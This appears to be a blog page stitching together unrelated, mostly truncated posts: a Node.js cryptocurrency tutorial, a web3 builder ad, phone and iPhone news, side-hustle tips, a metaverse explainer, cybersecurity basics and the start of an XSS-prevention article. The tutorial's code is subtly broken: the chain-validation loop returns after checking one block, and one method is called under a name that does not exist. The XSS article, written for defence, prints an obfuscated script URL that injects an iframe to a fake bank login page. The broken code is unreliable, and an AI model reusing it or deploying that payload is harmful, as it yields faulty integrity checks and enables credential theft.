Interests

A blockchain is a digital record of transactions that is shared among nodes of a computer network, powering cryptocurrencies and many decentralized applications. The blockchain is an innovative, decentralized, and distributed public ledger that keeps a record of a growing list of transactions known as blocks. Transactions on the blockchain are recorded and secured cryptographically, reducing potential flaws and vulnerabilities. The blockchain is made up of chain-like connections of different blocks, hence the name blockchain. Even though it is in its infancy, the blockchain has found applications in many industries like finance, government, collectibles, DeFi, security, artworks like NFTs, and more. It has also created lots of opportunities and new jobs for developers, content writers, NFT creators, and more. The blockchain is very important when building decentralized applications because it ensures security and data integrity, building trust in users. A cryptocurrency is a digitally secured virtual currency developed using cryptographic techniques. Cryptography ensures the security and integrity of the currency. In this tutorial, we’ll learn how to develop a cryptocurrency using Node.js, a popular JavaScript server runtime engine. Node.js is a JavaScript backend environment that runs JavaScript code outside of the browser. In this article, we’ll introduce Node.js developers to the blockchain space by creating a simple cryptocurrency. Let’s get started! To follow along with this article, you’ll need: Node.js installed on your computer A basic understanding of Node.js A basic understanding of the blockchain technology A code editor Properties of a block Earlier, we mentioned that the blockchain is composed of several blocks. Let’s explore what the properties of each block are. Every block in the chain is made up of the following properties: Proof of work: The amount of computational effort required to get a block hash Block hash: Block ID derived through cryptographic calculation Timestamp: Time when the block was created Index: Block’s position on the chain Data recorded on the blockchain The previous block’s hash Installing dependencies Since we’re building a cryptocurrency with Node.js, we need to first install the JavaScript crypto.js package in our project folder. Create a folder and name it nodejscrypto, as shown below: To install the package, run the following command in your terminal: // create a package.json file npm init -y //install the crypto-js dependency npm install crypto-js We’ll use a single file for this project. Create a file in the project folder named nodejsCoin.js, as show in the image above. Creating our first block Now that we have our project structure set up with our package installed, let‘s create our first block and subsequently build our own cryptocurrency. Go ahead and copy the following lines of code into the nodejsCoin.js file: //import that secure hash algorithm from the crypto-js package const SHA256 = require(“crypto-js/sha256”); //create a JavaScript class to represent a Block class Block{ constructor(index, timestamp, data, previousHash){ this.index = index; this.timestamp = timestamp; this.data = data; this.previousHash = previousHash; this.hash = this.generateHash(); } generateHash(){ return SHA256(this.index + this.timestamp + this.previousHash + JSON.stringify(this.data)).toString() } } First, I imported the Secure Hash Algorithm (SHA256) from the crypto-js package, which helps us to encrypt our block hash ID. Then, I created a JavaScript Block class to represent a template for every block on the chain. As with JavaScript and other object oriented programming languages like Java, whenever a class is created, a constructor method is called by default. Whenever the Block object is called using the new keyword, we call the constructor method and pass the parameters needed to create a new block. Inside the constructor method, we assigned the values of the parameters, arguments, to the field. The this keyword signifies that we’re referring to the field name that come after it. Lastly, we created a generateHash() method that generates and returns the hash of the block using the properties defined in the constructor. Now that we’ve created our first block, let’s create the blockchain. Creating the blockchain The blockchain is a system for recording a collection of data in a chain-like way, increasing data integrity, reducing vulnerabilities, and making the data nearly impossible to be hacked. More specifically, a blockchain is a distributed database that stores transactions in groups known as blocks. Let’s create a blockchain class that will manage the chain of of blocks: class Blockchain{ constructor(){ this.blockchain = [this.createGenesisBlock()]; } createGenesisBlock(){ return new Block(0, \”11/04/2022\”, \”first block on the chain\”, \”0\”); } getTheLatestBlock(){ return this.blockchain[this.blockchain.length – 1]; } addNewBlock(newBlock){ newBlock.previousHash = this.getLatestBlock().hash; newBlock.hash = newBlock.generateHash(); this.blockchain.push(newBlock); } // testing the integrity of the chain validateChainIntegrity(){ for(let i = 1; i<this.blockchain.length; i++){ const currentBlock = this.blockchain[i]; const previousBlock = this.blockchain[i-1]; if(currentBlock.hash !== currentBlock.generateHash()){ return false; } if(currentBlock.previousHash !== previousBlock.hash){ return false; } return true; } } } From the code snippet above, we created a class, Blockchain and invoked the no-argument constructor method, a constructor without parameters or arguments. Within the constructor block, we assigned an array containing the method that creates the genesis block, createGenesisBlock(). A genesis block is the initial block in a blockchain, which you can link other blocks to. You can also refer to the genesis block as the ancestor block. Every block created on the blockchain always references the previous block on the chain. But the genesis block has no reference, so we have to hardcode its properties within the createGenesisBlock() method. Notice how I called the new keyword on the Block constructor and passed the required arguments to create a block: Index: 0 Timestamp: 11/04/2022 Data: First block on the chain Hash: 0 The getTheLastBlock() method returns the latest block on the blockchain, helping us keep track of the current and the previous hash on the blockchain. The next method is the addNewBlock() method, which takes a parameter called newBlock. In the method body, the hash of the latest block on the chain is set to be equal to the new block’s previous hash. On the next line, I used generateHash() to calculate the hash of the new block and finally push the new block onto the blockchain, which is an array of blocks. The validateChainIntegrity() method checks the validity of the chain. One core characteristic of the blockchain is that it is irreversible. If any information on a block in the blockchain is tampered with, the blockchain integrity is affected. The validateChainIntegrity() method helps us to

Three easy steps to launch your web 3 website Launching a web 3 website has been made easy with the help of the first-ever web 3 website builder. Below are the 3 easy steps to make your website Provide basic details about your business such as name, logo, contact number, etc. Choose a design from hundreds of designs created by Myraah’s AI. Launch on Web 3, you can use to access your site at: https://yourname.myraah.site Get a Domain name to make your site available Your Web 3 website can be opened by typing yourdomain.com rather than a myrah.site subdomain. In this case, you will need to attach the domain to your web3 site You can attach a domain to your web3 site, using our integration. You can either attach a pre-owned domain or buy a domain through us. This is how to use the first web 3 website builder,

The Samsung Galaxy S22 Ultra is considered a top on the list of the best phones on the market right now, and it\’s easy to see why. Whether you\’re a photography fan who needs a DSLR-rivaling smartphone, a constant note-taker who likes the look of the S Pen stylus, or someone who spends loads of time gaming or streaming video, there are lots to love. However the phone\’s high price can put some people off, and that\’s why it\’s great that there are rivals getting your attention. Three phones have been launched that could steal you away from the Samsung Galaxy S22 Ultra. We\’ll run you through these three phones, in the order they were launched. ZTE Axon 40 Ultra ZTE\’s Axon 40 line debuted on the 9th of May, and there was an Ultra member of the family coming along for the ride. This looks like a giant phone which bears more than a passing resemblance to the S22 Ultra, though with an in-display selfie camera so the screen looks unbroken. It has three 64MP rear cameras, up to 1TB of storage and 16GB of RAM, and a 2K 6.8-inch screen – so it sounds impressive in a range of ways. We\’ll have to see if this one becomes widely available because lots of ZTE Axon phones get launched outside the company\’s home region of China, but not all of them. Sony Xperia 1 IV Sony\’s flagship phones are often super-powerful – and super-expensive, it was launched on the 11th of May. Xperia phones are designed for creative professionals, with camera lenses and sensors built by the same minds that create Sony\’s Alpha cameras, and with extra tools lie the ability to use it as an extra viewfinder for photography. Plus, they\’re often just as powerful as Samsung galaxy S22 ultra and the displays have a 4K resolution which gives them the trophy when it comes to high-res displays. Honor Magic 4 Pro May 12 brought the final big launch of the week, and it was from Honor. It was actually the global launch of the Honor Magic 4 series. This is the Honor Magic 4 Pro, and due to it already part-launching earlier in the year, we already knew lots about it. It has a 6.81-inch 120Hz screen, a powerful Snapdragon 8 Gen 1 chipset, and an eye-catching design. Perhaps the highlights, on paper, are its cameras: there\’s a 50MP main, 50MP ultra-wide, and 64MP telephoto trio on the back, and a 12MP camera and 3D Time-of-Flight sensor for selfies. We\’ll have to see just how well it performs in action, but if it\’s priced right, this could be a top contender to replace the Samsung Galaxy S22 ultra for our \’best phones\’ title. Check out our article on the Apple iPhone 14 Pro and iPhone 14 Pro Max pop in purple.

In this article, I want to share with you a few side hustles that you may look into, learn about, and make money from. Also, don’t anticipate any shady employment or a side hustle that requires no work. Because this type of side hustle doesn’t exist. Without a doubt, each and every side hustle is easy because the majority of us(I, as well as my friends) have done it and are making money. However, every side hustle necessitates consistency and some effort. Let’s get started. 1. Earn Money from Selling Code Yes, you read that correctly. Some websites might assist you in earning money by selling codes. But how exactly? Some artists, entrepreneurs, and company owners require websites for their work. And for that, they must engage a freelancer, use WordPress or another website editor, or purchase websites. Well, someone has to sell in order to purchase a website. And the seller is a programmer, more specifically a developer. This is one of the Side hustles that is vastly overlooked in the programming world, but a lot of developers are making money from it. Git Market and Codecanyon, for example, are two places where you can sell your code. It is a website that provides website and app code. There are thousands of PHP scripts, mobile app templates, HTML5 templates, JavaScript code, and other resources. So you may develop websites, applications, or plugins and sell them on CodeCanyon or GitMarket. 2. Selling APIs Selling APIs is one of the newest and most popular side hustles to consider. Especially if you’re a web developer, you don’t have to learn new technologies because you’re mostly working with APIs. There are platforms, such as RapidAPI, where developers may sell API and make money. This is one of the side hustles that are very profitable to Web developers, especially if you are a backend or full-stack developer; You can easily develop APIs and sell to people who may need them. So, if you know JavaScript or Python, you can get started with this side business.  Become an Online Content Creator What if I told you that the creative economy has more money than the rest of the world combined? And did you know that programmers enjoy a plethora of additional benefits? The following are the two explanations behind this: Top firms like LinkedIn, Facebook, and even Medium are investing in hiring more creators. You may be aware that LinkedIn has introduced a creator mode, and that Medium has acquired Knowable in order to add audio to the site. Programmers are in high demand, so if you know how to code, you can teach, help, provide value, and earn money. And what you want to do is absolutely up to you. You may create YouTube lessons and courses to sell on sites like Skillshare and Udemy. You can publish on Medium instead of making videos if you don’t want to do them. You may also create content about newly funded, purchased, or launched technology or enterprises. According to my experience, you will make a lot of money, and your earnings will grow as you provide more value. What is the best way to get started? Begin with what you know now; you don’t need to be an expert. Becoming a Web3 Developer I’m a web developer who is interested in the technology that underpins Web3, Blockchain, and the metaverse, which is generating such a stir in our society. What’s more intriguing is that becoming a web3 developer is straightforward for a web developer like myself. I don’t need to learn a lot of new technology; all I need to know is how to use Solidity, Truffle, and Ganache with web technologies. According to numerous polls, the vast majority of people are uninformed of Defi, Web3, or CBDC o how it can be used to make money as one of the side hustles. Also, don’t think about blockchain as solely being beneficial in the banking sector or for digital payments. There’s a lot more to it than that, of course. It may be useful for voting processes, supply chain management, regulatory compliance, auditing, IoT operating systems, and many other applications.And please allow me to divulge a few secrets to you. The vast majority of IT behemoths have begun to create blockchain-related technology. Furthermore, most organizations have started to pay more for web3 engineers. In a word, if you’re a web developer, you can learn about blockchain technology rapidly and utilize it to generate more money.

Life-like fan-made renderings of the Apple iPhone 14 Pro and iPhone 14 Pro Max have shown up on social media with both devices stylishly clad in purple. Most of the iPhone 14 Pro and iPhone 14 Pro Max details and specs were recently leaked to the public, although there is still some uncertainty over display sizes. There are always plenty of fan-made concept renderings and anticipations to enjoy during the waiting period for any major tech device release; however, few match the life-like look of the Apple iPhone 14 Pro and iPhone 14 Pro Max shown off in these new efforts by Instagram resident @atuos_user. The images have been shared on social media and have even been mistaken as the real deal, which considering a likely September/October launch for the iPhone 14 series, is a little premature. But, it appears that most of the details concerning the iPhone 14 Pro and iPhone 14 Pro Max have already been leaked via multiple channels and social media platforms, right down to the specifications, camera equipment, design changes, and even alleged price tags. Apple’s familiar iPhone design language can be clearly seen in the life-like renderings (see below), with the iPhone 14 Pro depicted in both purple and white (starlight) while the Max variant appears solely in purple. The Apple iPhone 14 Pro is expected to have around a 6.1-inch display, a titanium alloy frame, a pill and hole notch setup, and it is rumored to have a price tag starting at US$1,099. The bigger iPhone 14 Pro Max, which will also have a titanium alloy frame and the same notch solution for the screen, is believed to be about 6.78 inches and could cost from US$1,199 if recent leaks are spot on. If the 2022 iPhones look this good, there will be a lot of happy Apple fans queueing up for one come fall time.

The Metaverse is a concept of an online, 3D, Virtual Universe that combines various Virtual spaces together to allow users to work, game, and socialize in these 3D spaces. This Concept of the metaverse is not really in Existence, at least not yet, but there are several Metaverse-like online platforms. The most prominent place you can find these metaverse-like platforms are mostly in Recent Video-games where Game developers have really turned gaming into more than just playing games but more of a thrilling life experience where you can immerse yourself on an adventure of meeting fellow gamers, transacting with them and so on, thereby making the whole experience almost real-lifey. Another Very useful fit for the metaverse is cryptocurrencies, which are basically a simulated virtual currency, that has made it possible for the digital economy to exist with different virtual coins and NFTs. The Metaverse already has metaverse-like applications that exist and provide people with liveable incomes. Axie Infinity is one play-to-earn game that many users play to support their income. SecondLive and Decentraland are other examples of successfully mixing the blockchain world and virtual reality apps. The Metaverse while not in existence fully yet, has really given developers ideas to develop software that encompasses the physical, financial and social lives of their users to link these aspects together to give users the full experience of actually living, making a living, networking, gaming, etc all through one piece of software; which can be and is usually a gaming software. The Metaverse and Gaming 3D Virtual reality games have made it possible for games to offer the closest metaverse experience currently. This point isn’t just because they are 3D, though. Video games now offer services that cross over into other aspects of our lives. The video game Roblox even hosts virtual events like concerts and meetups. Players don\’t just play the game anymore; they also use it for other activities and parts of their lives in \”cyberspace\”. For example, in the multiplayer game Fortnite, 12.3 million players took part in Travis Scott\’s virtual in-game music tour. This is amazing because normal games that were previously played just for fun can actually be used as a medium for networking, online meetings etc How does crypto fit into the metaverse? Gaming provides the 3D aspect of the metaverse but doesn’t cover everything needed in a virtual world that can cover all aspects of life. Crypto offers the other key parts required, such as digital proof of ownership, transfer of value, governance, and accessibility. But what do these mean exactly? If in the future, we work, socialize, and even purchase virtual items in the metaverse, we need a secure way of showing ownership. We also need to feel safe transferring these items and money around the metaverse. Finally, we will also want to play a role in the decision-making taking place in the metaverse if it will be such a large part of our lives. Some video games contain some basic solutions already, but many developers use crypto and blockchain instead as a better option. Blockchain provides a decentralized and transparent way of dealing with the topics, while video-game development is more centralized. Blockchain developers also take influence from the video game world too. Gamification is common in Decentralized Finance (Defi) and GameFi. It seems there will be enough similarities in the future that the two worlds may become even more integrated. The key aspects of blockchain suited to the metaverse are:1. Digital proof of ownership: By owning a wallet with access to your private keys, you can instantly prove ownership of an activity or an asset on the blockchain. For example, you could show an exact transcript of your transactions on the blockchain while at work to show accountability. A wallet is one of the most secure and robust methods for establishing a digital identity and proof of ownership.2. Digital collectibility: Just as we can establish who owns something, we can also show that an item is original and unique. For a metaverse looking to incorporate more real-life activities, this is important. Through NFTs, we can create objects that are 100% unique and can never be copied exactly or forged. A blockchain can also represent ownership of physical items.3. Transfer of value: A metaverse will need a way to transfer value securely that users trust. In-game currencies in multiplayer games are less secure than crypto on a blockchain. If users spend large amounts of time in the metaverse and even earn money there, they will need a reliable currency. Some MetaVerse Examples SecondLive ‌SecondLive is a 3D virtual environment where users control avatars for socializing, learning, and business. The project also has an NFT marketplace for exchanging collectibles. In September 2020, SecondLive hosted Binance Smart Chain\’s Harvest Festival as part of its first anniversary. The virtual expo showcased different projects in the BSC ecosystem for users to explore and interact with. Axie Infinity Axie Infinity is a play-to-earn game that’s provided players in developing countries an opportunity to earn consistent income. By purchasing or being gifted three creatures known as Axies, a player can start farming the Smooth Love Potion (SLP) token. When sold on the open market, someone could make roughly $200 to $1000 (USD) depending on how much they play and the market price. While Axie Infinity doesn\’t provide a singular 3D character or avatar, it gives users the opportunity for a metaverse-like job. You might have already heard the famous story of Filipinos using it as an alternative to full-time employment or welfare. Decentraland Decentraland is an online, digital world that combines social elements with cryptocurrencies, NFTs, and virtual real estate. On top of this, players also take an active role in the governance of the platform. Like other blockchain games, NFTs are used to represent cosmetic collectibles. They\’re also used for LAND, 16×16 meter land parcels that users can purchase in the game with the cryptocurrency MANA. The combination of all of these creates a complex crypto-economy. Closing thoughts While a single, united metaverse is likely a long way off, we

In recent years, There has been an increase in cybercrime. Thieves steal customer social security numbers from corporations’ computer systems. Unscrupulous hackers grab passwords and personal information from social media sites or pluck company secrets from the cloud. For companies of all sizes, keeping information safe is a growing concern. This is why we will be discussing Cyber Security and Its Importance. What is Cyber Security Cyber security consists of all the technologies and practices that keep computer systems and electronic data safe. And, in a world where more and more of our business and social lives are online, it’s an enormous and growing field with great importance.   According to the Cyber Security & Infrastructure Security Agency (CISA), \”Cyber security is the art of protecting networks, devices, and data from unauthorized access or criminal use and the practice of ensuring confidentiality, integrity, and availability of information.\” What is Information Security? Information security is the processes and tools designed and utilized to protect sensitive business information from modification, disruption, destruction, and inspection, according to CISCO. Information security and cyber security are often confused. According to CISCO, information security is a crucial part of cyber security but is used exclusively for ensuring the security of data. Everything is connected by computers and the internet now, including communication, entertainment, transportation, shopping, medicine, and more. A copious amount of personal information is stored among these various services and apps, and this is why information security is critical. Importance of Cyber Security Getting hacked isn’t just an attack on confidential data companies need. It can also ruin their relationships with customers, and even place them in significant legal jeopardy. With new technology, from self-driving cars to internet-enabled home security systems, the dangers of cybercrime become even more serious.  So, it’s no wonder that international research and advisory firm Gartner Inc. predicts worldwide security spending will hit $170 billion by 2022, an 8% increase in just a year.  These days, the need to protect confidential information is a pressing concern at the highest levels of government and industry. State secrets can be stolen from the other side of the world. Companies, whose whole business models depend on control of customers\’ data, can find their databases compromised. In just one high-profile 2017 case, personal information for 147.9 million people – about half the United States – was compromised in a breach of credit reporting company Equifax. What is a Cyber Attack? A cyber attack is an unwelcomed attempt to steal, expose, alter, disable or destroy information through unauthorized access to computer systems, according to the International Business Machines Corporation (IBM). The reasons for attacks can range from cyber warfare, cyber terrorism, and even hacktivists, but these actions fall into three main categories: criminal, political, and personal. Attackers motivated by crime are typically seeking financial gain through money theft, data theft, or business disruption. Similarly, personal attackers include disgruntled current or former employees who will take money or data in an attempt to attack a company\’s systems. Socio-political motivated attackers desire attention for their cause, resulting in their attacks being known to the public, and this is a form of hacktivism. Other forms of cyberattacks include espionage, spying to gain an unfair advantage over the competition, and intellectually challenging. This is why there is a great importance of cyber security in this day and age. Who is Behind Cyber Attacks? Attacks against enterprises can come from a variety of sources such as criminal organizations, state actors, and private persons, according to IBM. An easy way to classify these attacks is by outsider versus insider threats. Outsider or external threats include organized criminals, professional hackers, and amateur hackers (like hacktivists). Insider threats are typically those who have authorized access to a company\’s assets and abuse them deliberately or accidentally. These threats include employees who are careless of security procedures, disgruntled current or former employees, and business partners or clients with system access. Importance of Cyber Awareness Cyber security awareness month takes place every October and encourages individuals and organizations to own their role in protecting their cyberspace, according to Forbes. Although, anyone can practice being mindful of cyber security at any time. It is a time to be aware of cyber security and the importance of having a good knowledge of cyber security. Cyber security awareness can mean different things to different people depending on their technical knowledge. Ensuring appropriate training is available to individuals, is a great way to motivate lasting behavioral changes. While cyber security awareness is the first step, employees and individuals must embrace and proactively use effective practices both professionally and personally for it to truly be effective, according to Forbes. Conclusion Cyber security is very important considering the increase in cyber attacks over the recent years, There are different types of attacks and it is important you are able to identify them in other to find the best way to prevent them from happening.

Preventing Cross-Site Scripting Attacks is one of the major Cyber-security Precaution every Web Developer should learn take So as to prevent exploits within your own organization. Cross-site scripting is a security exploit in which the attacker inserts malicious client-side code into webpages, This has been around since the 1990s and most major websites like Google, Yahoo and Facebook have all been affected by cross-site scripting flaws at some point. Attacks exploiting XSS vulnerabilities can steal data, take control of a user\’s session, run malicious code, or be used as part of a phishing scam. Preventing These Cross-Site Scripting Attacks has now become a major concern for many developers, especially in the Web 2.0 era, Many believe Web 2.0 has created the latest round of Cross-Site Scripting attacks; in fact, they\’re mainly just variations on an old theme. What is true, though, is that Ajax (asynchronous JavaScript and XML) technologies change the threat landscape in that they allow an attacker to exploit cross-site scripting vulnerabilities in a more secret manner. Ajax applications tend to be very complex and active, there being many more interactions between the browser and server, and pages can even pull in content from other sites. This setup makes it difficult to test the many possible permutations of user and service interaction, allowing old vulnerabilities, making it quite difficult to prevent these Cross-Site Scripting Attacks. Sites continue to fall prey to Cross-Site Scripting attacks because most of them need to be interactive, accepting, and returning data from users. This means attackers, too, can interact directly with an application\’s processes, passing data designed to disguise themselves as legitimate application requests or commands through normal request channels such as scripts, URLs, and form data. This communication at the application layer can exploit applications whose developers do not take the necessary steps in preventing these Cross-Site Scripting Attacks to bypass traditional perimeter security defenses. According to a 2008 WhiteHat Security Statistics Report, 90% of all websites have at least one vulnerability, and 70% of all vulnerabilities are XSS-related. In this article, the first in a series on application-layer attacks, I want to look at how and why XSS attacks work and what you can do to Prevent this Cross-Site Scripting Attacks from your own Web applications. Cross-site scripting explained: How XSS attacks workCross-site scripting attacks are different than most application-layer attacks, such as SQL injection, as they attack an application\’s users, not the application or server. Attacks work by injecting code, usually a client-side script such as JavaScript, into a Web application\’s output. Most websites have numerous injection points, such as search fields, feedback forms, cookies and forums that are vulnerable to cross-site scripting. The most common purpose of XSS attacks is to gather cookie data, as cookies are commonly and regularly used incorrectly to store information such as session IDs, user preferences or login information. Although client-side scripts cannot directly affect server-side information, they can still compromise a site\’s security, often using Document Object Model manipulation to alter form values or switch the form action to post the submitted data to the attacker\’s site. Let\’s look at how simple an XSS attack can be. The XYZ football club\’s message board allows club members to post comments about the team and its performance. Comments are stored in an online database and displayed to other members without ever being validated or encoded. A malicious member can simply post a comment containing a script enclosed by the <script> tags. The attacker then waits for other members to view the comment. Since the text inside a <script> tag is not generally displayed, other members may not even be aware that the script has executed; merely viewing the comment will execute the script. The script can legitimately request the member\’s cookie information and pass it to the attacker. This type of XSS attack is known as persistent XSS because the malicious script is rendered more than once. XSS attacks work even if the site is viewed over an SSL connection, because the script is run in the context of the \”secured\” site, and browsers cannot distinguish between legitimate and malicious content served up by a Web application. But attackers don\’t have to rely on injecting their code into a site\’s comment page. They can try to trick a victim into clicking on a URL in a phishing email, which then injects code into the viewed page, giving the attacker full access to that page\’s content –- this is a non-persistent XSS attack. URL encoding is often used in such attacks to disguise the link and make users more likely to follow it. In the example below, the link is to a secure a https URL to a trusted site: https://www.userstrustedbank.com/script/loginservelet?function=\”> <script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,97,98,97,100,98,97,110,107,46,99,111,109,47,108,111,103,105,110,32,112,104,112,62))</script>  Users see that the link is to www.userstrustedbank.com and is over an SSL connection; it looks genuine enough since links often have long, seemingly meaningless text at the end. The user clicks the link. However, the code between the <script> tags when translated by a browser reads:  <iframe src=http://www.abadbank.com/login.php>  This attack string renders an IFRAME — an HTML document embedded inside another HTML document on a website — in the context of userstrustedbank\’s actual site. The attacker\’s login.php page will be mocked up to look exactly like the userstrustedbank\’s login page, tricking the user into entering and sending his login username and password to the bad bank server, the source of the IFRAME, while all the time being on the real userstrustedbank.com website. This very attack has been used on banks\’ websites this year.For more cross-site scripting informationGet the latest news, videos and expert advice on Web application security. Spooks website made basic blunder in XSS testing. Find more information on application attacks, buffer overflows and cross-site scripting. Essentially, the underlying problem and cause of XSS holes is that many dynamically created webpages display user input that is not validated or encoded. If you don\’t validate user-generated input and control how it is processed or published, you could fall victim to an XSS attack. (In my previous article, The true test of a Web application